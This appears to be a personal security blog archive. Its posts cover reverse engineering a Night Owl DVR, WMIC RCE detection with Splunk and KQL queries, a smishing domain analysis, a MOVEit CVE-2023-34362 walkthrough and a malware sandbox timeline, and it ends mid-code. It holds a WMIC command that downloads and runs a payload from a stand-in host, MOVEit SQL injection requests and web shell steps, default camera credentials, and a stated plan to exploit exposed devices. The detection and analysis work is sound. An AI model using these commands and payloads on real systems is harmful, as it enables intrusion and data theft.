Author: Ben

  • Analyzing Night Owl Protect CMS Application Logs + Ghidra

    Analyzing the network traffic pcap led me to see that this “American” company is using a foreign (Taiwanese) P2P network and authentication infrastructure for viewing Night Owl streams via their CMS app. I don’t like it. However, the network traffic didn’t tell me why I can’t view live/recorded video playback in the Windows application. So, this requires a deep dive into the application logs. I also want to understand how the executable works and want to learn how to use Ghidra and reverse engineer more in depth.

    Application Logs

    I copied the program parent directory over to my linux machine for analysis. Navigated to ..\OprLog and found the app log files. During inspection of an entire log file, I found no errors regarding video playback. But, interestingly enough, Night Owl stores credentials in plaintext!!!

    It’s 2024, people. Can we not store creds in plaintext, please??

    But, alas, since I still did not find any ERROR messages regarding playback, it is time to dig into reverse engineering the firmware.

    Ghidra

    My DVR version is DVR-FTD4-8. I downloaded the firmware file from here: https://support.nightowlsp.com/hc/en-us/articles/13090197774747-FTD4-Series

    Next, I attempted to import the firmware bin into Ghidra, but found that I did not know the architecture. I could make an educated guess, but really had no idea what DVR systems use for processors.

    So, I attempted to attach a keyboard to the device, reboot the DVR, and spam any and all keys that might drop me into the bootloader in order to find the specific processor architecture. But no such luck.

    I ended up pulling the plug on the DVR and opening up the case.

    Unfortunately, the processor is covered with the heat sink. Next best thing is to look up the board schematics to see if there are correlating FCC documents showing specific processors. Motherboard is AHB8008T-NB-T36-OWL v1.02.

    I found an FCC document for the bluetooth chip radiation evaluation. However, this does not provide any schematics or information on the processor.

    There is no information on this specific OWL-branded board, so I queried for only AHB8008T and found that various security camera DVRs use this parent board. This led me to a CVE referencing this board and its manufacturer, Xiongmai.

    I searched for Xiongmai plus the board name and found that it uses a Hisilicon Hi3531D:

    The above documentation explains that this processor uses ARM Cortex A9@1.4 GHz. I imported it as ARM Cortex (little endian).

    Conclusion of Part One

    I now have the firmware loaded into Ghidra. I also already have the exe and all dlls ready for import. Does the firmware contain any helpful information for me to find out why I’m experiencing the black video playback? Probably not. But I want experience in reverse engineering firmware.

    Most likely the video playback error will be found in a dll and referenced in the exe. But I am also interested in finding security vulnerabilities in this product (such as the plaintext credentials) since I use this to help secure my home. And I’m also interested in finding how much of what is being sent to foreign companies and governments (and possible adversaries). Then I want to find these devices on shodan to see if I can exploit their p2p protocol.

  • Analyzing Night Owl Protect CMS PCAP

    Home security camera systems that offer ONLY offline DVR, wired cameras on a LAN — with the capability to port forward video streams to a mobile app — are non-existent. Every single “security” company offering “security” cameras requires you to connect to its cloud servers — even if the product is wired to your LAN with offline DVR storage. I hate it. But I had to get something, so I picked up Night Owl Protect from Costco back in Summer 2023.

    The iOS app is fine. The MacOS app is fine. I hate how it has no web browser app (hate it). But the Windows app, which I presumed would work better than Apple, doesn’t work. Below are the relevant details:

    • Issue: Video playback boxes for both live and recorded video are black frames
    • OS Version: Windows 11 Pro 24H2 26100.2605
    • CMS Version: 1.0.22.T.20230912
    • Night Owl Protect Model: DVR-FTD4-8_1.2.4

    Analysis

    Wireshark PCAP

    A DNS query is made to ota.no-protect.com. VirusTotal shows that this is a domain associated with Night Owl, used to manage devices and your account via the browser; there is no way to view video there. The DNS response points to .kota.kalayservice.com. This refers to the Kalay Developer Console (KDC), “which is a tool from TUTK that provides smart device development tools, records, and documentation.” Kalay is developed by TUTK (ThroughTek Co) as a platform for IoT devices and cloud video management.

    During the authentication phase, the application calls out to all-c-master-NightOwl.iotcplatform.com. It is owned by ThroughTek and used for the remote access of AV streams. It is used for “punching” through NAT via the iotcplatform library in order to make it “user friendly” (hate it).

    iotcplatform, kalay, and ThroughTek are all part of the same Taiwanese (probably Chinese) company umbrella of ThroughTek Co, Ltd. IOTCPlatform is the networking infrastructure. Kalay is the P2P software infrastructure.

    Funny side note: Night Owl SP, LLC was sold in 2020 to SFP Holding, Inc. Then in 2021, BlackRock acquired a majority interest in Summit.

    I’m pretty sure I found a useful RTSP error packet, namely an invalid sample rate of 90000 for the H265 codec.

    I think the application is having a hard time running the h.265 codec, namely because there’s another RTP packet seemingly trying to enforce h.264. (Also, don’t mind the user and password in the RTSP URI. It’s only for that local client with a specific token. It’s not for the actual stream.)

    I was able to test the RTSP stream on VLC on my linux desktop. Turns out Night Owl uses the default RTSP credentials of admin:admin. And if the streamer has multiple cameras, make sure to specify channel=. You can also specify if you want video and/or audio by using stream=1 or 0 and audio=1 or 0.

    Anyways, I did check the specs on my Windows machine, and the CPU is an Intel Celeron N5095. According to Intel, it does support HEVC/h.265 via its Quick Sync Video capability. Though, there are those who have had mixed luck with the codec.

    Initial Conclusion

    I’m with you @Flintsone61. I feel ya.

    Could be H.265/HEVC related since it was working on my Windows machine, but now it’s not. Unsure. I’ll be taking a look at the application logs in part two. I did find they store credentials in plaintext, which is fun…

  • WMIC RCE Activity: Understanding Exploitation and Detection

    I’m not a Windows sysadmin — nor have I ever been. But lately some Sentinel alerts I’ve been seeing at work are WMIC RCE related.

    Windows Management Instrumentation Command-Line (WMIC) is a built-in Windows tool that allows administrators to manage systems remotely through WMI. While beneficial for legitimate use, WMIC is often exploited by attackers for RCE and lateral movement within networks. For SOC analysts, detecting and mitigating WMIC abuse is critical to maintaining network security.

    WMIC for Remote Code Execution

    WMIC can execute commands or scripts remotely using simple syntax, making it an ideal tool for attackers once they gain access to a network. By using WMIC, attackers bypass traditional executable file defenses and leverage its native status to remain under the radar.

    Example of WMIC RCE Abuse

    wmic /node:"192.168.1.100" /user:"admin" /password:"password123" process call create "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://malicioussite.com/payload.exe -OutFile payload.exe; Start-Process payload.exe"
    

    This command downloads and executes a malicious payload on the target machine, a common tactic in ransomware or advanced persistent threat (APT) scenarios.

    Detection Methods: SOC Analyst Perspective

    Both Splunk and Azure Sentinel offer robust capabilities to monitor, detect, and respond to WMIC-related threats.

    Splunk

    In Splunk, analysts can craft queries to identify anomalous WMIC usage based on Windows Event Logs and Sysmon data.

    • Important Data Sources:
      • Windows Security Logs (e.g., Event IDs 4688, 4624, 7045).
      • Sysmon logs (for detailed process creation events).
      • Network traffic logs (to detect communication with suspicious IPs).
    • Splunk Query Example:
    index=windows EventID=4688 (New_Process_Name="*\\wmic.exe") 
    | search CommandLine="*process call create*" 
    | stats count by Account_Name, ComputerName, CommandLine, ParentProcessName

    This query filters for process creation events involving wmic.exe with suspicious commands, such as process call create. SOC analysts should investigate any outputs showing unusual accounts, command lines, or originating from unexpected workstations.

    • Additional Actions in Splunk:
      • Correlate with Threat Intelligence Feeds: Check if the destination IP or URL in the WMIC command is flagged in threat intelligence.
      • Monitor Outbound Network Traffic: Identify if WMIC commands are followed by anomalous data exfiltration.

    Azure Sentinel

    Sentinel provides built-in detection rules and the ability to create custom analytics queries for WMIC abuse.

    • Important Data Sources in Sentinel:
      • Windows Security Events (via Azure Log Analytics Agent).
      • Sysmon logs (if integrated with Sentinel).
      • Defender for Endpoint data (for endpoint-level insights).
    • KQL Query Example in Sentinel:
    SecurityEvent 
    | where EventID == 4688 and NewProcessName endswith "wmic.exe" 
    | where CommandLine contains "process call create" 
    | extend AccountCustomEntity = Account 
    | extend HostCustomEntity = Computer 
    | project TimeGenerated, Account, Computer, CommandLine

    This query highlights the use of WMIC to execute remote commands. Sentinel allows analysts to integrate custom alerts with workflows using Playbooks to trigger automated responses, such as disabling the account involved or isolating the affected machine.

    • Hunting Query for Lateral Movement:
    DeviceProcessEvents 
    | where FileName == "wmic.exe" and ProcessCommandLine contains "node:"  
    | summarize count() by InitiatingProcessAccountName, DeviceName, ProcessCommandLine
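    The same detection logic the Splunk and KQL queries above express, as an added example that is not part of the original post, applied offline to a few constructed process creation records in the key=value style of an exported Event ID 4688. The hostnames, accounts and IP address in the sample records are invented; the rule is the one the post gives (wmic.exe plus "process call create"), with the "/node:" lateral movement check layered on top and the results aggregated the way "stats count by" would.

```python
import re
from collections import Counter

# Constructed sample events in the key=value style of exported Windows Event ID 4688
# records; hostnames, accounts and the IP address are invented for the demo.
SAMPLE_EVENTS = [
    'EventID=4688 Account_Name=svc_backup ComputerName=WS-01 '
    'ParentProcessName="C:\\Windows\\System32\\cmd.exe" '
    'New_Process_Name="C:\\Windows\\System32\\wbem\\WMIC.exe" '
    'CommandLine="wmic /node:\\"10.0.0.25\\" process call create \\"cmd /c whoami\\""',
    'EventID=4688 Account_Name=jdoe ComputerName=WS-02 '
    'ParentProcessName="C:\\Windows\\explorer.exe" '
    'New_Process_Name="C:\\Windows\\System32\\wbem\\WMIC.exe" '
    'CommandLine="wmic os get caption"',
    'EventID=4688 Account_Name=svc_backup ComputerName=WS-01 '
    'ParentProcessName="C:\\Windows\\System32\\cmd.exe" '
    'New_Process_Name="C:\\Windows\\System32\\wbem\\WMIC.exe" '
    'CommandLine="wmic /node:\\"10.0.0.25\\" process call create \\"cmd /c whoami\\""',
    'EventID=4688 Account_Name=jdoe ComputerName=WS-02 '
    'ParentProcessName="C:\\Windows\\System32\\cmd.exe" '
    'New_Process_Name="C:\\Windows\\System32\\notepad.exe" '
    'CommandLine="notepad.exe"',
]

# key=value pairs; a value is either a double-quoted string (with \" escapes) or a bare token
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S*)')


def parse_event(line):
    """Split one key=value record into a dict, unquoting and unescaping quoted values."""
    fields = {}
    for key, raw in FIELD_RE.findall(line):
        if raw.startswith('"') and raw.endswith('"'):
            raw = raw[1:-1].replace('\\"', '"')
        fields[key] = raw
    return fields


def is_wmic_process_create(event):
    """The post's rule: a 4688 event for wmic.exe whose command line contains 'process call create'."""
    return (
        event.get("EventID") == "4688"
        and event.get("New_Process_Name", "").lower().endswith("\\wmic.exe")
        and "process call create" in event.get("CommandLine", "").lower()
    )


def is_remote(event):
    """The lateral movement hunt: a /node: target means the process is created on another host."""
    return "/node:" in event.get("CommandLine", "").lower()


def summarize(lines):
    """Mirror 'stats count by Account_Name, ComputerName, CommandLine, ParentProcessName',
    keeping only flagged events and tagging whether each one targets a remote host."""
    counts = Counter()
    for line in lines:
        ev = parse_event(line)
        if is_wmic_process_create(ev):
            key = (ev.get("Account_Name"), ev.get("ComputerName"),
                   ev.get("CommandLine"), ev.get("ParentProcessName"), is_remote(ev))
            counts[key] += 1
    return dict(counts)


if __name__ == "__main__":
    for (account, host, cmdline, parent, remote), n in summarize(SAMPLE_EVENTS).items():
        print(f"{n}x {account}@{host} parent={parent} remote={remote}: {cmdline}")
```

    Run as-is it reports one row: two identical remote "process call create" invocations by svc_backup from cmd.exe on WS-01, while jdoe's "wmic os get caption" and the notepad launch fall through, which is the triage view the post recommends (unusual account, command line, or parent).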

    Best Practices for Defense

    • Restrict WMIC Usage:
      Use Group Policy or Local Security Policy to limit access to WMIC for administrators and critical systems only.
    • Deploy Baseline Rules:
      Configure Splunk and Sentinel to flag WMIC commands deviating from organizational baselines.
    • Automate Responses:
      Leverage Sentinel Playbooks and Splunk Phantom to automate actions like isolating hosts or alerting admins.
    • Monitor Attack Chains:
      Correlate WMIC events with other activity, such as privilege escalation or file downloads, to detect broader attack campaigns.

    Conclusion

    WMIC abuse is a common tactic among attackers, leveraging a legitimate Windows utility for malicious purposes. For SOC analysts, mastering detection techniques in Splunk and Azure Sentinel is key to mitigating this threat. Look for remote /node and process call create options.

  • KQL query to change Azure Sentinel log timestamp format

    Analysts forget that Sentinel logs output the TimeGenerated field values as UTC.

    Add this line to create a reformatted timestamp field congruent to your time zone:

    | extend FormattedTime = format_datetime(datetime_add('hour', -4, TimeGenerated), 'yyyy-MM-dd HH:mm:ss')

    Remember to change the amount value to the UTC difference for your time zone. For example, I am in the US Eastern Time Zone, which is -4.

    Now you can use the FormattedTime field string in the remainder of your query.
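    The caveat a practitioner will hit with the fixed "-4" above is daylight saving time: US Eastern is UTC-4 only during EDT and UTC-5 during EST, so the same query shifts winter timestamps by the wrong hour. The following Python, an added example rather than anything from the original post, reproduces what the datetime_add line does and puts a DST-aware version beside it. The US rule it hard-codes (second Sunday of March to first Sunday of November, switching at 02:00 local) is this example's own assumption about the zone, not something the post states.

```python
from datetime import datetime, timedelta, timezone


def _nth_sunday(year, month, n):
    """Day-of-month of the n-th Sunday (n=1 first Sunday, n=2 second Sunday)."""
    first = datetime(year, month, 1, tzinfo=timezone.utc)
    first_sunday = 1 + (6 - first.weekday()) % 7  # weekday(): Monday=0 ... Sunday=6
    return first_sunday + 7 * (n - 1)


def eastern_offset_hours(utc_dt):
    """-4 during EDT, -5 during EST. The switch instants are computed in UTC so they are exact."""
    year = utc_dt.year
    # 02:00 EST (UTC-5) on the second Sunday of March is 07:00 UTC
    dst_start = datetime(year, 3, _nth_sunday(year, 3, 2), 7, tzinfo=timezone.utc)
    # 02:00 EDT (UTC-4) on the first Sunday of November is 06:00 UTC
    dst_end = datetime(year, 11, _nth_sunday(year, 11, 1), 6, tzinfo=timezone.utc)
    return -4 if dst_start <= utc_dt < dst_end else -5


def format_time_fixed(time_generated, offset_hours):
    """What the post's KQL line does: datetime_add('hour', offset, TimeGenerated), then format."""
    utc_dt = datetime.fromisoformat(time_generated).astimezone(timezone.utc)
    return (utc_dt + timedelta(hours=offset_hours)).strftime("%Y-%m-%d %H:%M:%S")


def format_time_eastern(time_generated):
    """Same output shape, but the offset is chosen per timestamp."""
    utc_dt = datetime.fromisoformat(time_generated).astimezone(timezone.utc)
    return format_time_fixed(time_generated, eastern_offset_hours(utc_dt))


if __name__ == "__main__":
    # Constructed TimeGenerated values: one in summer, one in winter.
    for ts in ("2024-07-01T12:00:00+00:00", "2024-01-15T12:00:00+00:00"):
        print(ts, "fixed -4 ->", format_time_fixed(ts, -4),
              "| DST-aware ->", format_time_eastern(ts))
```

    The July timestamp agrees either way; the January one lands at 08:00 with the fixed offset and 07:00 with the DST-aware one. In Sentinel itself the equivalent is to use datetime_utc_to_local(TimeGenerated, 'US/Eastern') instead of a hand-picked hour value, so the query stays correct across the switch.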

    https://learn.microsoft.com/en-us/kusto/query/format-datetime-function?view=microsoft-fabric
    https://learn.microsoft.com/en-us/kusto/query/datetime-add-function?view=microsoft-fabric

  • Analyst Advice: Data Flow

    New to an environment? Learn data flow.

    Veteran to an environment? See if you can draw out the data flow from memory.

    The most important thing to know as an Analyst is how data flows in your environment. Ask senior analysts or department leadership for existing documents with diagrams showing how data/traffic ingresses to, egresses from, and moves within the network.

    If there is no documentation, create it yourself. This helps you learn the environment, provides knowledge share with the SOC team, and shows added value to the customer.

    1. Log into your SIEM (Splunk, Sentinel, etc.) and list all indices/schemas and data sources to understand which devices and what types of data are being logged in the SIEM. This indicates the network and security solutions in place.
    2. Next, write down what resources are usually accessed in the environment and then brainstorm how a user would access that data. For example, if it’s a Confluence portal with sensitive documentation data, does the user authenticate via an external facing portal first? Or is it only internally accessible?
    3. Look at the device flow that is required for a user to authenticate, then access the data, and then to egress the data.
    4. Chart these scenarios into a Visio or PowerPoint slide to show the firewalls, proxies, AD servers, web servers, and databases used in the scenario.

    Data flow analysis lets the Analyst see the forest for the trees and how navigation through the forest is possible. It is crucial for effective incident response analysis.

  • Analyzing a Smishing Attempt

    Most days I ignore, delete, and/or block phishing emails or smishing messages. However, let’s dig into one to see what we can find.

    Phone Number

    A quick Google search shows that +63 is a Philippines country code. Hopefully this is an immediate signal that it is a phishing attempt.

    No results for the full phone number show up anymore. Honestly, it’s probably a throw-away number.

    URL Analysis

    I put the URL into URLScan: https://urlscan.io/result/e478ca5f-d6f8-424b-b25f-afab8cc38236/

    Results show no redirections but straight to a landing page for the ezdrivema[.]com-siiiic[.]top domain.

    We can see the page is a clone of the Massachusetts Department of Transportation’s EZPass program: https://www.mass.gov/ezdrivema. Funny enough, their website is alerting against this smishing attack:

    The URLScan result shows a POST form /ezpassmalogin that is associated with the whole page whenever the user clicks on the button. However, all other links on the page lead to the legitimate MA DOT page. I’m not sure what all the javascript is doing, but it looks like it could be a “man in the middle” type scenario.

    I also tried to access the URL via AnyRun, but it could not reach it.

    VirusTotal results are below:

    0/94, https://www.virustotal.com/gui/domain/ezdrivema.com-xiiiic.top

    5/96, https://www.virustotal.com/gui/url/28782f6b4692ca68adc1cc37ca2182ddcc10ad48fb3237aed1494b951bd1094b

    Looks like even VirusTotal returns a 404 error. I think the URLScan results are cached from when a different user scanned it before the attacker took down the domain.

    The domain was served by 47.89.248[.]140. This is a domestically geolocated IP address owned by Alibaba cloud services. NSlookup shows that the IP also serves the following domains:

    ezdrivema[.]com-xiiiic[.]top
    ezdrivema[.]com-xiiiir[.]top
    ezdrivema[.]com-xiiiij[.]top
    ezdrivema[.]com-heeeq[.]top
    ezdrivema[.]com-xiiiif[.]top
    ezdrivema[.]com-xiiiia[.]top
    ezdrivema[.]com-heeet[.]top
    ezdrivema[.]com-xiiiin[.]top
    ezdrivema[.]com-heeec[.]top
    ezdrivema[.]com-xiiiiq[.]top
    ezdrivema[.]com-xiiiik[.]top
    ezdrivema[.]com-xiiiib[.]top
    ezdrivema[.]com-heeez[.]top
    ezdrivema[.]com-heeef[.]top
    ezdrivema[.]com-youshz[.]top
    ezdrivema[.]com-gdsgdff[.]top
    ezdrivema[.]com-youshc[.]top
    ezdrivema[.]com-guonix[.]top
    ezdrivema[.]com-youshs[.]top
    ezdrivema[.]com-gdsgdfa[.]top
    ezdrivema[.]com-gdsgdfd[.]top
    ezdrivema[.]com-guonib[.]top
    ezdrivema[.]com-youshe[.]top
    ezdrivema[.]com-gdsgdfz[.]top
    ezdrivema[.]com-guonia[.]top
    ezdrivema[.]com-guonis[.]top
    ezdrivema[.]com-gdsgdfr[.]top
    ezdrivema[.]com-youshq[.]top
    ezdrivema[.]com-guonif[.]top
    ezdrivema[.]com-guonit[.]top
    ezdrivema[.]com-gdsgdfq[.]top
    ezdrivema[.]com-gdsgdfe[.]top
    ezdrivema[.]com-guoniz[.]top
    ezdrivema[.]com-youshx[.]top
    ezdrivema[.]com-guonih[.]top
    ezdrivema[.]com-gdsgdfc[.]top

    Looks like the scammers are varying the parent domain pattern. This IP address also has a pattern of phishing websites before 2023. However, all of them also seem to be HTTP status 404.
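    A small triage helper for the list above, added here as an example and not part of the original post. It refangs each entry, shows that the registrable domain is the attacker's "com-xxxxx.top" label rather than anything under ezdrivema.com, and groups the throwaway names by the stem in front of the rotating last letter so the pattern the post notices is visible at a glance. The sample is a subset of the post's list; treating "ezdrivema.com" as the brand string the lure imitates, and taking the last two labels as the registrable domain instead of consulting the Public Suffix List, are simplifications made by this example.

```python
import re
from collections import defaultdict

# A subset of the defanged hostnames from the post, exactly as published.
SAMPLE_DOMAINS = """
ezdrivema[.]com-xiiiic[.]top
ezdrivema[.]com-xiiiir[.]top
ezdrivema[.]com-heeeq[.]top
ezdrivema[.]com-heeet[.]top
ezdrivema[.]com-youshz[.]top
ezdrivema[.]com-youshc[.]top
ezdrivema[.]com-gdsgdff[.]top
ezdrivema[.]com-gdsgdfa[.]top
ezdrivema[.]com-guonix[.]top
ezdrivema[.]com-guonib[.]top
""".split()


def refang(indicator):
    """Turn 'a[.]b' / 'hxxp://' style defanging back into a real hostname or URL."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def defang(indicator):
    return indicator.replace(".", "[.]")


def registrable_domain(hostname):
    """Last two labels of the hostname. Deliberate simplification: a real tool uses the
    Public Suffix List, but under '.top' the registrable part is the label directly
    below the TLD, which is all this analysis needs."""
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def spoofs_brand(hostname, brand_domain="ezdrivema.com"):
    """True when the brand's domain text appears in the hostname but is NOT the registrable
    domain: 'ezdrivema.com-xiiiic.top' reads like ezdrivema.com yet is registered under .top."""
    host = hostname.lower()
    return brand_domain in host and registrable_domain(host) != brand_domain


# 'com-' + stem + one rotating letter + '.top'
STEM_RE = re.compile(r"^com-([a-z]+?)[a-z]\.top$")


def group_by_stem(hostnames):
    """Cluster the registrable domains by the stem in front of the final rotating letter."""
    groups = defaultdict(list)
    for h in hostnames:
        reg = registrable_domain(refang(h))
        m = STEM_RE.match(reg)
        stem = m.group(1) if m else reg
        groups[stem].append(defang(reg))
    return dict(groups)


if __name__ == "__main__":
    for h in SAMPLE_DOMAINS:
        print(f"{h:38} registrable={defang(registrable_domain(refang(h))):20} spoof={spoofs_brand(refang(h))}")
    for stem, members in group_by_stem(SAMPLE_DOMAINS).items():
        print(f"stem {stem!r}: {len(members)} domains -> {', '.join(members)}")
```

    The useful output for a blocklist is the stem groups: rather than adding 35 individual hostnames, a defender can see that five "com-<stem><letter>.top" families are being rotated on one host and write the block rule at that level.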

    Conclusion

    I have a virtual sms number to be used for testing smishing attackers, but I’m not ready to pay for international texts.

    And the attacker has already taken all the domains down.

  • Welltok MOVEit Transfer Simulated Walkthrough

    Another classic example of a third-party breach ruining it for the rest of us.

    On 22 December 2023, the Denver-based wellness company, Welltok, sent a letter to the Attorney General of Connecticut, informing him of 847,356 CT residents’ compromised health data.

    The letter describes that the real compromise occurred in May 2023 when a Threat Actor (TA) utilized the then unknown MOVEit zero-day vulnerability to exfiltrate customer data from the file server. Sadly, there was nothing that Welltok could’ve done to mitigate an unknown zero day. Although, Welltok’s SOC or CyberInfra team (whatever it may be) could have had specific alerts for anomalous data exfiltration of sensitive data (i.e., customer PHI) from important data file servers and modification of accounts to sysadmin level privileges.

    Below is how it would’ve gone down.

    Reconnaissance (TA0043)

    TA scans the public-facing servers with various fingerprints, T1595.003 — whether manually (e.g., a curl -v -I command), with a homemade scanner bot, or via a premium service (e.g., Censys, Shodan, etc.). Possible fingerprints could be:

    • /human.aspx indicates Progress MOVEit Transfer login form
    • Header including Server: Progress MOVEit
    • Possible HTML title tag including MOVEit Transfer

    Initial Access (TA0001)

    Exploit Public Facing Application (T1190)

    TA sends an HTTPS GET request to populate the ASP.NET_SessionId cookie in order to start a session with the server:

    $ curl -I https://moveit.example.com
    ...
    set-cookie: ASP.NET_SessionId=yxg0zv4pkpkqoobio0uoe2zf;
    ...

    Next, the TA uses a vulnerability in the MOVEitISAPI.dll to set session variables for the session:

    curl -H "xx-silock-transaction: folder_add_by_path" -H "X-siLock-Transaction: session_setvars" -I https://moveit.example.com/moveitisapi.dll?action=m2

    To explain, m2 is an action parameter in the compiled DLL. When it is called, it allows the folder_add_by_path value to be set via the X-siLock-Transaction header. However, when this header is sent (X-siLock-Transaction: folder_add_by_path), ISAPI (Internet Server API) [which filters calls to the Microsoft IIS web server’s ASP.NET application] reads the header name case-insensitively and as a substring within a larger string, whereas .NET requires an exact, case-sensitive match. This means the ISAPI filter can pass multiple x-silock-transaction header values, with the second header being the only one read by the .NET server.

    MOVEit accepts X-SILOCK-* headers and the aforementioned dll accepts custom headers, which is what the transaction session_setvars allows. For example:

    POST /MOVEitISAPI/MOVEitISAPI.dll?action=m2 HTTP/1.1
    Host: 192.168.37.144
    Connection: close
    XX-siLock-Transaction: folder_add_by_path
    X-siLock-Transaction: session_setvars
    X-siLock-SessVar1: MyUsername: Guest
    X-siLock-SessVar2: MyPkgValidationCode: 1
    X-siLock-SessVar3: MyInstMessaging: 1
    X-siLock-SessVar4: MyGuestEmailAddr: x@example.com
    X-siLock-SessVar5: MyPkgID: 0
    X-siLock-SessVar6: MyPkgSelfProvisionedRecips: x' or 1=1) LIMIT 1; -- a
    X-siLock-SessVar7: MyPkgAccessCode: 1'; update users set notes='pwned' where loginname='sysadmin'; -- a
    Cookie: ASP.NET_SessionId=21ts1wiqbftjbjqjbrnjbuxj; siLockLongTermInstID=0
    Content-Length: 0

    In this case, the TA submits a SQL injection using the earlier Guest credentials to create a new sysadmin user with admin-level permissions by targeting the activesessions table.
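    A log-side check for the header trick described above, added here as an example and not part of the original post or of any vendor detection. It parses a raw HTTP request (the sample is the one quoted above) and flags three things a reverse proxy or WAF log review should catch: more than one header whose name case-insensitively contains x-silock-transaction, a session_setvars transaction, and X-siLock-SessVar values carrying SQL metacharacters. The finding strings and the regex are this example's own choices.

```python
import re

# The request quoted in the post, used here as the sample input.
SAMPLE_REQUEST = """POST /MOVEitISAPI/MOVEitISAPI.dll?action=m2 HTTP/1.1
Host: 192.168.37.144
Connection: close
XX-siLock-Transaction: folder_add_by_path
X-siLock-Transaction: session_setvars
X-siLock-SessVar1: MyUsername: Guest
X-siLock-SessVar2: MyPkgValidationCode: 1
X-siLock-SessVar6: MyPkgSelfProvisionedRecips: x' or 1=1) LIMIT 1; -- a
X-siLock-SessVar7: MyPkgAccessCode: 1'; update users set notes='pwned' where loginname='sysadmin'; -- a
Cookie: ASP.NET_SessionId=21ts1wiqbftjbjqjbrnjbuxj; siLockLongTermInstID=0
Content-Length: 0

"""

# Quote, comment marker, or a stacked statement after a semicolon
SQL_META_RE = re.compile(r"'|--|;\s*(update|insert|delete|drop|select)\b", re.IGNORECASE)


def parse_request(raw):
    """Return (method, target, [(name, value), ...]), keeping duplicate headers in order."""
    head = raw.split("\n\n", 1)[0].splitlines()
    method, target, _version = head[0].split(" ", 2)
    headers = []
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, headers


def transaction_headers(headers):
    """Headers ISAPI would treat as the transaction header (substring, case-insensitive)
    versus the one .NET actually reads (exact name match)."""
    loose = [(n, v) for n, v in headers if "x-silock-transaction" in n.lower()]
    strict = [(n, v) for n, v in headers if n.lower() == "x-silock-transaction"]
    return loose, strict


def find_findings(raw):
    """List of human-readable findings for one request; empty means nothing suspicious."""
    method, target, headers = parse_request(raw)
    findings = []
    if "moveitisapi.dll" in target.lower() and "action=m2" in target.lower():
        findings.append("request targets MOVEitISAPI.dll action=m2")
    loose, strict = transaction_headers(headers)
    if len(loose) > 1:
        findings.append(f"{len(loose)} transaction-like headers: {[n for n, _ in loose]}")
    if any(v.lower() == "session_setvars" for _, v in strict):
        findings.append("X-siLock-Transaction=session_setvars (session variable injection)")
    for n, v in headers:
        if n.lower().startswith("x-silock-sessvar") and SQL_META_RE.search(v):
            findings.append(f"SQL metacharacters in {n}: {v[:40]!r}")
    return findings


if __name__ == "__main__":
    for finding in find_findings(SAMPLE_REQUEST):
        print("-", finding)
```

    On the sample request this yields five findings (the m2 action, the XX-/X- header pair, session_setvars, and SessVar6 and SessVar7); a plain login-page fetch yields none. The duplicate-header check is the one worth keeping generically: any pair of header names that only differ by case or by a prefix is a sign that two parsers in the chain may disagree about which one counts.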

    Finally, to maintain the session for further access, a POST request retrieves the CSRF token. Ensure Transaction is set to dummy, Arg06 is set to anything, and Arg12 is set to promptaccesscode:

    $ curl -ski 'https://moveit.example.com/guestaccess.aspx?Transaction=dummy&Arg06=accesscode&Arg12=promptaccesscode' | grep csrf
    [...]
    <input type="hidden" name="csrftoken" value="44ad7cfa2e1a73b7a636c0bb0f9ff8d8b8e4239d">
    [...]

    Persistence (TA0003)

    Web Shell (T1505.003)

    Once admin-level permissions are achieved, the TA uploads a reverse web shell into the new sysadmin account’s API directory structure. Ensure uploadType is set to resumable:

    POST https://moveit.example.com/api/v1/folders/{id}/files?uploadType=resumable

    The file will be encrypted in the fileupload database table, but it can be deserialized. Once done, the web shell file is ready to go.

    Conclusion

    The MOVEit Transfer attack was a complex hack that affected a lot of orgs in the Federal government and in DoD. It was not a trivial happenstance. However, I hope this helped understand it a bit more.

    For more in-depth analysis of the software and the possible exploitation path, please refer to Assetnote’s and Rapid7’s work:

    https://www.assetnote.io/resources/research/moveit-transfer-rce-part-two-cve-2023-34362

    https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis?referrer=etrblog

  • kombat.exe Analysis

    This is more or less a part three to the naprava.exe analysis. Turns out the SD card holds many malicious surprises.

    Again, this is a 14-year-old malware executable from Moldova that was inadvertently stored on a SD card.

    Analysis

    Submitted the file to AnyRun. The file performs the following actions (with the respective timestamps):

    +47ms      File drops C:\Users\admin\lzmjqt.exe
    +63ms      lzmjqt.exe writes a new shell key to WinLogon registry
    +218ms     Creates process svchost.exe
    +281ms     svchost.exe runs file C:\Users\admin\lzmjqt.exe
    +1313ms    DNS request to slade.safehousenumber[.]com
    +31039ms   murik.portal-protection[.]net[.]ru
    +60758ms   world.rickstudio[.]ru
    +91480ms   banana.cocolands[.]su
    +121s      DNS request to portal.roomshowerbord[.]com
    +150s      DNS request to slade.safehousenumber[.]com
    +271s      DNS request to portal.roomshowerbord[.]com

    The executable drops the lzmjqt.exe. This second executable writes a persistent reverse shell to the WinLogon registry. Then the original executable creates a svchost.exe process. The svchost.exe then runs the dropped file. This malware then reaches out to its C2 domains — slade.safehousenumber[.]com and portal.roomshowerbord[.]com.
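    A check for the persistence step in that timeline (a new Shell value under the Winlogon key, MITRE T1547.004), added here as an example and not part of the original post or of AnyRun's output. It runs over constructed Sysmon-style "registry value set" records (Event ID 13) and reports any Winlogon Shell or Userinit write whose data is not the stock value. The dropped-file path mirrors the post; the other images, the HKCU write and the Run-key entry are invented for the demo, and the stock values are this example's assumption about a default install.

```python
import re

# Constructed Sysmon Event ID 13 style records; only the lzmjqt.exe path comes from the post.
SAMPLE_REGISTRY_EVENTS = [
    {"EventID": 13, "Image": "C:\\Users\\admin\\lzmjqt.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell",
     "Details": "explorer.exe,C:\\Users\\admin\\lzmjqt.exe"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell",
     "Details": "explorer.exe"},
    {"EventID": 13, "Image": "C:\\Windows\\regedit.exe",
     "TargetObject": "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell",
     "Details": "C:\\Users\\admin\\AppData\\Roaming\\updater.exe"},
    {"EventID": 13, "Image": "C:\\Windows\\System32\\svchost.exe",
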